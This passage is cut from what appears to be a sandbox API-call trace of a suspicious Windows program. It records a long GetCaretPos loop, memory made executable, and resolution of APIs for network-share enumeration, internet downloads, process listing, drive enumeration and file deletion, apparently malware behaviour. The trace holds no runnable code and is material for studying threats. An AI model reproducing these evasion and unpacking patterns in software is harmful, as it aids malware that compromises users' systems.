lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.172] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.173] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.174] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.175] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0038.418] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0038.418] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0038.418] LocalAlloc (uFlags=0x0, uBytes=0x90f18) returned 0x2d0020 [0038.426] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0038.426] VirtualProtect (in: lpAddress=0x2d0020, dwSize=0x90f18, flNewProtect=0x40, lpflOldProtect=0x18fd4c | out: lpflOldProtect=0x18fd4c*=0x4) returned 1 [0038.462] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9 [0038.462] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0038.462] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0038.464] Module32First (hSnapshot=0x58, lpme=0x18ede0) returned 1 [0038.465] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x760000 [0038.496] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0038.496] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0038.497] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0038.497] SetErrorMode (uMode=0x400) returned 0x0 [0038.497] SetErrorMode (uMode=0x0) returned 0x400 [0038.497] GetVersionExA (in: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0038.497] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x2000000 [0038.513] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed98 | out: lpflOldProtect=0x18ed98*=0x2) returned 1 [0038.701] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x75ee0000 [0038.701] GetProcAddress (hModule=0x75ee0000, lpProcName="RpcStringFreeW") returned 0x75f01635 [0038.701] GetProcAddress (hModule=0x75ee0000, lpProcName="UuidCreate") returned 0x75eff48b [0038.701] GetProcAddress (hModule=0x75ee0000, lpProcName="UuidToStringW") returned 0x75f21ee5 [0038.701] GetProcAddress (hModule=0x75ee0000, lpProcName="RpcStringFreeA") returned 0x75f23fc5 [0038.701] GetProcAddress (hModule=0x75ee0000, lpProcName="UuidToStringA") returned 0x75f5d918 [0038.701] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74b30000 [0038.704] GetProcAddress (hModule=0x74b30000, lpProcName="WNetOpenEnumW") returned 0x74b32f06 [0038.704] GetProcAddress (hModule=0x74b30000, lpProcName="WNetEnumResourceW") returned 0x74b33058 [0038.704] GetProcAddress (hModule=0x74b30000, lpProcName="WNetCloseEnum") returned 0x74b32dd6 [0038.704] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x753d0000 [0038.714] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCloseHandle") returned 0x753eab49 [0038.714] GetProcAddress (hModule=0x753d0000, lpProcName="InternetReadFile") returned 0x753eb406 [0038.714] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenUrlW") returned 0x7544be5c [0038.715] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenW") returned 0x753f9197 [0038.715] GetProcAddress (hModule=0x753d0000, lpProcName="HttpQueryInfoW") returned 0x753f5c75 [0038.715] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenA") returned 0x753ff18e [0038.715] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenUrlA") returned 0x754130f1 [0038.715] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74af0000 [0038.717] GetProcAddress (hModule=0x74af0000, lpProcName="timeGetTime") returned 0x74af26e0 [0038.717] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0038.717] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendA") returned 0x7534d65e [0038.717] GetProcAddress (hModule=0x75340000, lpProcName="PathFindFileNameW") returned 0x7535bb71 [0038.717] GetProcAddress (hModule=0x75340000, lpProcName="PathRemoveFileSpecW") returned 0x75353248 [0038.718] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsA") returned 0x7537ad1a [0038.718] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsW") returned 0x753545bf [0038.718] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendW") returned 0x753581ef [0038.718] GetProcAddress (hModule=0x75340000, lpProcName="PathFindExtensionW") returned 0x7535a1b9 [0038.718] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeA") returned 0x76c4ef75 [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemDirectoryW") returned 0x76c35063 [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileW") returned 0x76c5830d [0038.718] GetProcAddress (hModule=0x76c20000, lpProcName="FormatMessageW") returned 0x76c34620 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpynW") returned 0x76c5d556 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessA") returned 0x76c31072 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentVariableA") returned 0x76c333a0 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpW") returned 0x76c35929 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="GetShortPathNameA") returned 0x76c5594d [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0038.719] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileW") returned 0x76c49af0 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventW") returned 0x76c3183e [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0038.720] GetProcAddress (hModule=0x76c20000, lpProcName="LocalFree") returned 0x76c32d3c [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="SetPriorityClass") returned 0x76c4cf28 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameW") returned 0x76c3dd0e [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDrives") returned 0x76c35371 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersion") returned 0x76c34467 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryA") returned 0x76c5d526 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeFormatW") returned 0x76c4f481 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="GetDateFormatW") returned 0x76c534d7 [0038.721] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesW") returned 0x76cb425f [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLCID") returned 0x76c33da5 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocale") returned 0x76c4ce46 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoW") returned 0x76c33c42 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreW") returned 0x76c4ca5a [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0038.722] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalMemoryStatus") returned 0x76c38b6d [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="FlushConsoleInputBuffer") returned 0x76cd7a9f [0038.723] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0038.723] GetProcAddress 